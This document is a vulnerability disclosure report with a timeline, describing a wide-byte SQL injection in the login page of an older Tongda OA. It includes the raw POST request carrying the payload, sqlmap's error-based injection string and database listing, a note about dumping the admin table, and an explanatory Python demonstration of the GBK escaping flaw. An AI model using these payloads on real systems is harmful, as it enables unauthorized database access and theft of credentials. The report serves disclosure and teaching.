2015-11-23: Details reported to the vendor; awaiting vendor handling
2015-11-27: Vendor confirmed; details disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and domain experts
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public
As titled.
0x01 Vulnerability location
http://**.**.**.**/
0x02 Vulnerability type
SQL injection (an issue in older Tongda OA versions)
0x03 Vulnerability details
First, I referred to an earlier article by a predecessor:
http://**.**.**.**/bugs/wooyun-2010-078915
which found a POST injection on the login page:
PASSWORD=g00dPa%24%24w0rD&submit=%b5%c7%20%c2%bc&UI=0&UNAME=%bf%27
0x04 Vulnerability request parameters
So I reused the predecessor's injection method:
POST /logincheck.php HTTP/1.1
Host: **.**.**.**
Content-Length: 47
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: PHPSESSID=60491e719c9eb87a488878cc39fd0c34

PASSWORD=g00dPa%24%24w0rD&submit=%b5%c7%20%c2%bc&UI=0&UNAME=%bf%27
0x05 Injection method
After taking advantage of the wide-byte issue, hand the request to sqlmap and let it run.
0x06 Vulnerability test results
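The wide-byte point above in code, as an added example that is not from the original report: a byte-level addslashes()-style escape turns `%bf%27` into the bytes `bf 5c 27`, and a GBK-configured connection reads `bf 5c` as one double-byte character, leaving the quote unescaped. The functions and the sample inputs are constructed for this demonstration; decoding strictly before escaping is shown only to illustrate why the order matters, with parameterized queries being the proper fix.

```python
# Constructed example: why a byte-level escape fails under GBK, and how
# strict charset-aware handling rejects the same input instead.

GBK = "gbk"


def addslashes_bytes(data: bytes) -> bytes:
    """Escape in the style of PHP addslashes(): insert a 0x5C backslash
    before ', ", \\ and NUL, byte by byte, ignoring the encoding."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def unescaped_quote_after_gbk_decode(escaped: bytes) -> bool:
    """Decode the escaped bytes as a GBK connection would and report whether
    a single quote remains without a backslash character in front of it."""
    text = escaped.decode(GBK, errors="replace")
    return any(ch == "'" and (i == 0 or text[i - 1] != "\\")
               for i, ch in enumerate(text))


def escape_as_text(raw: bytes, charset: str = GBK) -> str:
    """Hardened order: decode strictly first, then escape at character level.
    0xBF followed by 0x27 is not a valid GBK sequence, so strict decoding
    raises UnicodeDecodeError instead of silently merging bytes."""
    text = raw.decode(charset)  # strict: malformed multibyte input is an error
    return text.replace("\\", "\\\\").replace("'", "\\'")


def rejects_payload(raw: bytes) -> bool:
    """True when the strict path refuses the input as malformed GBK."""
    try:
        escape_as_text(raw)
    except UnicodeDecodeError:
        return True
    return False


if __name__ == "__main__":
    payload = b"\xbf'"  # URL-decoded UNAME=%bf%27 from the request above
    print(addslashes_bytes(payload).hex())  # bf5c27: bf+5c now form one GBK char
    print(unescaped_quote_after_gbk_decode(addslashes_bytes(payload)))  # True
    print(unescaped_quote_after_gbk_decode(addslashes_bytes(b"admin'")))  # False
    print(rejects_payload(payload))  # True
```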
---
Place: POST
Parameter: UNAME
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: PASSWORD=g00dPa$$w0rD&submit=%b5%c7 %c2%bc&UI=0&UNAME=%bf' AND (SELECT 7167 FROM(SELECT COUNT(*),CONCAT(0x71736f7671,(SELECT (CASE WHEN (7167=7167) THEN 1 ELSE 0 END)),0x71656e7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hBls
---
[20:33:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.14, Apache 2.2.16
back-end DBMS: MySQL 5.0
available databases [5]:
[*] BUS
[*] crscell
[*] information_schema
[*] mysql
[*] TD_OA
Here I only dumped the administrator table (TD_OA.user).
OK, all of the database information can be obtained...
Upgrade!!!
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-11-27 10:18
CNVD has confirmed and reproduced the described vulnerability; it has been forwarded through CNCERT to the Anhui branch center, which will coordinate handling with the website's administering organization.
None yet